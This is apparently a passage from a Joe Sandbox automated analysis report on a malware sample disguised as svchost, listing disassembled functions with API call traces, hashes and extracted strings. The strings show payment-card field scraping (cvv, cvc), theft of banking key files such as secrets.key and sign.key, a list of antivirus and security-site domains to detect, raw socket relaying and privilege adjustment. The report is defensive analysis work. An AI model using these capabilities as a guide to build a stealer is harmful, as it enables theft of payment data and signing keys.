                                                                                                                                                                                                                • Part of subcall function 02CB5930: AdjustTokenPrivileges.KERNELBASE(02CA4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02CB599B
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetLastError.KERNEL32 ref: 02CB59A5
                                                                                                                                                                                                                • Part of subcall function 02CB5930: FindCloseChangeNotification.KERNEL32(02CA4D1B), ref: 02CB59B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$Security$Descriptor$wsprintf$EventFile$FreeMutexThreadToken$BitsCapsConvertCurrentDeviceHeapInfoLocalMappingNamedOpenProcessSaclStringView$AdjustBitmapChangeCloseCompatibleComputerCountDeleteDesktopErrorFindLastLookupNameNotificationObjectPrivilegePrivilegesReleaseTickValuelstrlen
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 3490689938-820036962
                                                                                                                                                                                                              • Opcode ID: ba48f2f0a5d0e85a2dffea39c8d0e922a21144bf9c966d0ef73087c8ccd46d37
                                                                                                                                                                                                              • Instruction ID: 3bb23f3d5695a619167058dbd9ae67bea47877caa73cf53a14fc4fd4ad55b11d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba48f2f0a5d0e85a2dffea39c8d0e922a21144bf9c966d0ef73087c8ccd46d37
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD516171FC1305BAFB20ABA59C4AFA977A86B84B41F544615B702FA1C0DBF0A510CBA5
                                                                                                                                                                                                              Function 02CAE3F0 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 145memorystringthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv=,00000000,74DEF380,00000000,00000001,00000000,?,?,?,02CA8A44,?,?,?,?,?), ref: 02CAE433
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE441
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE44D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE45B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE467
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE479
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CAE48F
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CAE4A2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02CAE50B
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 02CAE512
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAE522
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAE580,00000000,00000000,00000000), ref: 02CAE548
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAE560
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAE571
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleHeapstrstr$AllocCloseCreateInformationProcessThreadmemset
                                                                                                                                                                                                              • String ID: &cvc=$&cvc=&$&cvv2=$&cvv2=&$&cvv=$&cvv=&$&domain=letitbit.net&
                                                                                                                                                                                                              • API String ID: 1632825432-2817208116
                                                                                                                                                                                                              • Opcode ID: 98aade386a48b1885374b392cdf34ede33207e624e73181e222d3e70375c5192
                                                                                                                                                                                                              • Instruction ID: 128183207ac910e31531dc42e2738a4e517b1729eb296ee47a067c637ff60dde
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98aade386a48b1885374b392cdf34ede33207e624e73181e222d3e70375c5192
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77418830A417132BE3228A3A7C79FBF379D4F8564EF684630E944D7241EB60C71582E4
                                                                                                                                                                                                              Function 02CA9B20 Relevance: 36.3, APIs: 24, Instructions: 271networkmemorythreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 02CA9B39
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA9B42
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 02CA9B4C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA9B4F
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 02CA9B75
                                                                                                                                                                                                              • send.WS2_32(?,02CD9E4C,00000002,00000000), ref: 02CA9BCC
                                                                                                                                                                                                              • send.WS2_32(?,02CDE1CC,00000002,00000000), ref: 02CA9BF2
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 02CA9C18
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000001,00000000), ref: 02CA9C92
                                                                                                                                                                                                              • gethostbyname.WS2_32(00000005), ref: 02CA9CC7
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 02CA9D0D
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 02CA9D24
                                                                                                                                                                                                              • inet_ntoa.WS2_32(?), ref: 02CA9D37
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 02CA9D47
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 02CA9D5A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000005), ref: 02CA9D67
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA9D6E
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 02CA9D7A
                                                                                                                                                                                                              • connect.WS2_32(?,?,00000010), ref: 02CA9D9C
                                                                                                                                                                                                              • send.WS2_32(?,?,0000000A,00000000), ref: 02CA9DB6
                                                                                                                                                                                                              • send.WS2_32(?,?,0000000A,00000000), ref: 02CA9DD0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CA9970,?,00000000,00000000), ref: 02CA9DEA
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 02CA9CBC
                                                                                                                                                                                                                • Part of subcall function 02CA98F0: shutdown.WS2_32(?,00000001), ref: 02CA990B
                                                                                                                                                                                                                • Part of subcall function 02CA98F0: shutdown.WS2_32(02CA99EC,00000001), ref: 02CA9910
                                                                                                                                                                                                                • Part of subcall function 02CA98F0: recv.WS2_32(02CA99EC,?,00000400,00000000), ref: 02CA992F
                                                                                                                                                                                                                • Part of subcall function 02CA98F0: recv.WS2_32(?,?,00000400,00000000), ref: 02CA9945
                                                                                                                                                                                                                • Part of subcall function 02CA98F0: closesocket.WS2_32(?), ref: 02CA9959
                                                                                                                                                                                                                • Part of subcall function 02CA98F0: closesocket.WS2_32(02CA99EC), ref: 02CA995C
                                                                                                                                                                                                                • Part of subcall function 02CA98F0: ExitThread.KERNEL32 ref: 02CA9960
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA9DFC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: recv$Heap$send$Process$AllocThreadclosesocketshutdown$CloseCreateExitFreeHandleconnectgethostbynamehtonsinet_ntoasocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 699211285-0
                                                                                                                                                                                                              • Opcode ID: 56351a7f7f674c00468cb8bfd28597ba0ffa504ef46ac42148f3a0510bd419c2
                                                                                                                                                                                                              • Instruction ID: 1ac61553f0534f829667e6e3eaaa91892503936e9a477dc0905db063761e8bf7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56351a7f7f674c00468cb8bfd28597ba0ffa504ef46ac42148f3a0510bd419c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9591E2B1648342BEE320EF748C96F6BBB9DAF84748F405908F682D61C1D774E944CB62
                                                                                                                                                                                                              Function 02C961B0 Relevance: 36.1, APIs: 12, Strings: 12, Instructions: 71COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,avast.com,?,?,02C962EC), ref: 02C961CB
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,kaspersky,?,?,02C962EC), ref: 02C961DB
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,drweb,?,?,02C962EC), ref: 02C961E7
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,eset.com,?,?,02C962EC), ref: 02C961F3
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,antivir,?,?,02C962EC), ref: 02C961FF
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,avira,?,?,02C962EC), ref: 02C9620B
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,virustotal,?,?,02C962EC), ref: 02C96217
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,virusinfo,?,?,02C962EC), ref: 02C96223
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,z-oleg.com,?,?,02C962EC), ref: 02C9622F
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,trendsecure,?,?,02C962EC), ref: 02C9623B
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,anti-malware,?,?,02C962EC), ref: 02C96247
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,.comodo.com,?,?,02C962EC), ref: 02C96253
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                              • API String ID: 0-375433535
                                                                                                                                                                                                              • Opcode ID: 193a527e4c2a84c4b6613b9f70daac6e1dbbda1c2c285745c7f00cbd6c272102
                                                                                                                                                                                                              • Instruction ID: 80be520f25b2a090cf2a66c8c792fb2b4b038a343610cc93057aed19419988cf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 193a527e4c2a84c4b6613b9f70daac6e1dbbda1c2c285745c7f00cbd6c272102
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA0163B2386B16253F21327A0C69F5F438C6EC2ACA3A10634FB01E4488E78AD30304A9
                                                                                                                                                                                                              Function 02C96100 Relevance: 36.1, APIs: 12, Strings: 12, Instructions: 71COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,avast.com,?,?,02C962AC), ref: 02C9611B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kaspersky,?,?,02C962AC), ref: 02C9612B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,drweb,?,?,02C962AC), ref: 02C96137
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,eset.com,?,?,02C962AC), ref: 02C96143
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,antivir,?,?,02C962AC), ref: 02C9614F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,avira,?,?,02C962AC), ref: 02C9615B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,virustotal,?,?,02C962AC), ref: 02C96167
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,virusinfo,?,?,02C962AC), ref: 02C96173
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,z-oleg.com,?,?,02C962AC), ref: 02C9617F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,trendsecure,?,?,02C962AC), ref: 02C9618B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,anti-malware,?,?,02C962AC), ref: 02C96197
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,.comodo.com,?,?,02C962AC), ref: 02C961A3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                              • API String ID: 0-375433535
                                                                                                                                                                                                              • Opcode ID: f2a78d04a2a3cfbe4e903a27e24819cb8cac78b7b5be2a69c410950c15f40a52
                                                                                                                                                                                                              • Instruction ID: 1c0d0f5abdecd29491ee9bb836674ff2e2599d648ddf4ada9ab445d2998a945e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2a78d04a2a3cfbe4e903a27e24819cb8cac78b7b5be2a69c410950c15f40a52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83018C73BC2796397E11717A8C95F5F468C0EC9CC93910630FA05F548AE78AC6430C75
                                                                                                                                                                                                              Function 00403050 Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 436commemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,?,?,7604DB30), ref: 00403060
                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                                • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                                • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                                • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                              • String ID: cmd.exe$p=<u
                                                                                                                                                                                                              • API String ID: 2839743307-310530878
                                                                                                                                                                                                              • Opcode ID: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                              • Instruction ID: bf3241a60ff26ee6c0642b95ea0adfafd6aded52afbf6c2e6df27db904542273
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CF1EC75E102199FCB00DFA8C884A9EBBB9FF88710F15815AE914BB351D774AD41CF94
                                                                                                                                                                                                              Function 02C91000 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 155memorythreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,02C9148C,00000000,?), ref: 02C9101B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013,74DEF570,?,02C9148C,00000000,?), ref: 02C9103E
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02C9148C,00000000,?), ref: 02C91045
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C91055
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,74DEF570,?,02C9148C,00000000,?), ref: 02C91073
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,name.key,00000000,?,02C9148C,00000000,?), ref: 02C91093
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB0810,00000000,00000000,00000000), ref: 02C910B9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,\secrets.key,?,02C9148C,00000000,?), ref: 02C910D5
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB20D0,00000000,00000000,00000000), ref: 02C910E5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,sign.key,?,02C9148C,00000000,?), ref: 02C910FD
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB2BB0,00000000,00000000,00000000), ref: 02C91116
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,02C9148C,00000000,?), ref: 02C9112A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,02C9148C,00000000,?), ref: 02C9113B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02C9148C,00000000,?), ref: 02C91150
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02C9148C,00000000,?), ref: 02C91153
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02C9148C,00000000,?), ref: 02C9115F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02C9148C,00000000,?), ref: 02C91162
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
                                                                                                                                                                                                              • String ID: \secrets.key$name.key$sign.key
                                                                                                                                                                                                              • API String ID: 3254303593-2345338882
                                                                                                                                                                                                              • Opcode ID: 6c1e4265809c46abf2943907203b8ca1c62eb328f0150c059997d8b0b8b110c7
                                                                                                                                                                                                              • Instruction ID: 514410003fa4256db857dde6f25c172720c827bf3ff3a8cde81c50cb8c9d3f4e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c1e4265809c46abf2943907203b8ca1c62eb328f0150c059997d8b0b8b110c7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF41E7315413527AAB316A669C8DFBF3B7CEFC6FE5B884619F919E2040D761C601CAB0
                                                                                                                                                                                                              Function 02CB10C0 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 192memoryfilestringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C42B7,?,75BFBF00), ref: 02CB10F0
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,75BFBF00), ref: 02CB1131
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,75BFBF00), ref: 02CB113B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB1143
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB1154
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,75BFBF00), ref: 02CB115B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,75BFBF00), ref: 02CB119A
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,75BFBF00), ref: 02CB11A7
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,75BFBF00), ref: 02CB11F0
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,75BFBF00), ref: 02CB120C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104,?,75BFBF00), ref: 02CB1229
                                                                                                                                                                                                                • Part of subcall function 02CB9780: GetProcessHeap.KERNEL32(00000008,00004070,74DF0F00,00000000,74DF2F00,?,02CA3CE8,?), ref: 02CB9793
                                                                                                                                                                                                                • Part of subcall function 02CB9780: HeapAlloc.KERNEL32(00000000,?,02CA3CE8,?), ref: 02CB9796
                                                                                                                                                                                                                • Part of subcall function 02CB9780: memset.MSVCRT ref: 02CB97AB
                                                                                                                                                                                                                • Part of subcall function 02CB9780: CreateFileA.KERNEL32(02CA3CE8,40000000,00000003,00000000,00000002,00000080,00000000,?,02CA3CE8,?), ref: 02CB9802
                                                                                                                                                                                                                • Part of subcall function 02CB9780: GetProcessHeap.KERNEL32(00000000,00000000,?,02CA3CE8,?), ref: 02CB9825
                                                                                                                                                                                                                • Part of subcall function 02CB9780: HeapValidate.KERNEL32(00000000,?,02CA3CE8,?), ref: 02CB9828
                                                                                                                                                                                                                • Part of subcall function 02CB9780: GetProcessHeap.KERNEL32(00000000,00000000,?,02CA3CE8,?), ref: 02CB9834
                                                                                                                                                                                                                • Part of subcall function 02CB9780: HeapFree.KERNEL32(00000000,?,02CA3CE8,?), ref: 02CB9837
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,75BFBF00), ref: 02CB1258
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C42B7,?,75BFBF00), ref: 02CB1277
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,?,75BFBF00), ref: 02CB12DB
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,75BFBF00), ref: 02CB12E8
                                                                                                                                                                                                                • Part of subcall function 02CB9910: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,74DF2F00), ref: 02CB9991
                                                                                                                                                                                                                • Part of subcall function 02CB9910: _snprintf.MSVCRT ref: 02CB99AD
                                                                                                                                                                                                                • Part of subcall function 02CB9910: FindFirstFileA.KERNEL32(00000000,?), ref: 02CB99BC
                                                                                                                                                                                                                • Part of subcall function 02CB9910: LocalFree.KERNEL32(00000000), ref: 02CB99C9
                                                                                                                                                                                                                • Part of subcall function 02CB9910: wsprintfA.USER32 ref: 02CB9A08
                                                                                                                                                                                                                • Part of subcall function 02CB9910: wsprintfA.USER32 ref: 02CB9A16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$AllocFreePathProcess$AttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$AdminCurrentDeleteFindFirstFolderMakeModuleNameSystemUserValidate_snprintflstrcpynmemset
                                                                                                                                                                                                              • String ID: A23C42B7$\$inter.zip$path.txt
                                                                                                                                                                                                              • API String ID: 3082343898-1055062414
                                                                                                                                                                                                              • Opcode ID: e7b253b048d9fa05624757711be6a49b4e1da5d78aa063acad880346c7d347ec
                                                                                                                                                                                                              • Instruction ID: d7a70feb2d0e894039ac9213f048882b361eb138c1e31085432076b6854fc2e5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7b253b048d9fa05624757711be6a49b4e1da5d78aa063acad880346c7d347ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 336149719412199FDB22CB34DCA8BEB7BE4EF85340F484694E98DD7241DBB19A48CB90
                                                                                                                                                                                                              Function 02CB28F0 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 189memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505,?,?,00000000), ref: 02CB2920
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000), ref: 02CB2961
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000), ref: 02CB296B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB2973
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB2984
